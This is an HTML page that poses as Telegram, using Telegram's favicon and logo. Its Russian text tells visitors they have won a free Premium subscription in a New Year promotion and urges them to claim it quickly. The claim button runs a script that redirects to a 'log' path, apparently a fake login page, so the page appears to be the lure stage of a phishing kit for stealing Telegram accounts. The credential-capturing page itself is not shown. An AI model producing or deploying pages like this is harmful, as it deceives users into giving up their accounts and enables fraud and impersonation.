<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;600&display=swap" rel="stylesheet">
    <link rel="icon" href="https://web.telegram.org/z/favicon.svg" type="image/svg+xml">
    <title>Telegram</title>
</head>
<body>
    <section class="container">
      <article class="auth_tg_to"> 
        <div class="tg">
            <svg height="150" viewBox="0 0 98 75" width="200" xmlns="http://www.w3.org/2000/svg"><g fill="#4ca3e2" fill-rule="evenodd"><path d="m91.8 19.5666667 8.5 11.3333333c.331371.4418278.241828 1.0686292-.2 1.4-.1730962.1298221-.3836298.2-.6.2h-17c-.5522847 0-1-.4477153-1-1 0-.2163702.0701779-.4269038.2-.6l8.5-11.3333333c.3313708-.4418278.9581722-.5313709 1.4-.2.0758057.0568542.1431458.1241943.2.2z" transform="matrix(0 1 -1 0 116.5 -65.5)"/><path d="m40 21h46v8h-46z"/></g></svg>
        </div>
        <span class="logo">
            <img class="auth_to" src="https://i.ibb.co/py8q3zd/logo.png"></img>
        </span> 
    </article>
        <div class="txt">
            <h1>Поздравляем! Вы получили
               <span class="prem">Premium</span> подписку в рамках новогодней акции от Telegram. </h1>
            <p>Успейте забрать его до окончания акции.</p>
        </div>
        <div>
              <button onclick="redirectToLogin()" class="next">Забрать</button>
        </div>
    </section>

    <script>
      function redirectToLogin() {
        window.location.href = window.location.href + "log"
      }
    </script>


      <style>

body {
    background-color: #212121;
    font-family: 'Poppins', sans-serif;
}

.container {
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    margin-top: 1%;
    text-align: center;
}

.txt {
  width: 375px;

}

.txt h1 {
    color: white;
    font-size: 1.2rem;
    text-align: center;
}

.txt p {
  font-size: 1rem;
  color: rgb(170,170,170);
}

.prem {
  color: #e354c3;
}

.auth_tg_to {
  display: flex;
  flex-direction: row;
  justify-content: center;
  align-items: center;
  margin-top: 1%;
  margin-bottom: 20px;
}

.tg {
  width: 190px;
  height: 100px;
  background: url('data:image/svg+xml,%3Csvg height="100" viewBox="0 0 50 50" width="100" xmlns="http://www.w3.org/2000/svg"%3E%3Cg fill-rule="evenodd"%3E%3Ccircle cx="25" cy="25" fill="%234ca3e2" r="25"/%3E%3Cpath d="m11.1838302 25.1315363c7.1532767-2.9934727 11.9232482-4.9669531 14.3099145-5.9204412 6.8144173-2.7224024 8.2303949-3.1953128 9.1533092-3.2109286.2029865-.0034345.6568489.0448847.950842.2740174.2482419.1934752.3165432.4548327.3492276.6382684.0326843.1834358.0733842.601307.0410309.9278195-.3692757 3.7267611-1.9671255 12.7706276-2.7800209 16.944664-.3439665 1.7661912-1.026197 2.1442046-1.6818831 2.2021587-1.4249578.1259476-2.5020563-.6903349-3.8821976-1.5593016-2.1596487-1.3597614-3.7791851-2.1170303-5.8754981-3.4439062-2.4226524-1.5334347-.2908188-2.3906915 1.0898437-3.7680664.361326-.3604656 6.7509766-6.1621094 6.8215001-6.027668.0306372.0584048-.192813-.6844486-.3362893-.8069372-.1434762-.1224887-.3552347-.0806023-.5080456-.0472897-.2166048.0472195-3.6666715 2.2375171-10.3502001 6.5708928-.97929.6458958-1.8663004.9605979-2.6610313.9441063-.876127-.0181806-2.561444-.4758095-3.814304-.8669794-1.5366837-.4797857-2.10392683-.7057418-1.9975768-1.5205665.0553937-.4244111.4458533-.8676919 1.1713788-1.3298423z" fill="%23fff"/%3E%3C/g%3E%3C/svg%3E')
            no-repeat 0 0;
}

.auth_to {
  width: 100px;
  height: 100px;
  margin-left: 25px;
  display: flex;
  justify-content: center;
  align-items: center;
}


.next {
  width: 320px;
  padding-top: 13px;
  padding-bottom: 13px;
  background-color: rgb(135,116,225);
  color: white;
  text-transform: uppercase;
  border-radius: 12px;
  margin-top: 15px;
  height: 100%;
  cursor: pointer;
  border: 0;
  transition: 0.3s;
  font-size: 15px;
}

.next:hover {
  background-color: rgb(93, 66, 202);
  border: 0;
  transition: 0.3s;
}


.input:focus {
    border: 1px solid rgb(118,106,200);

}




 
      </style>
</body>
</html>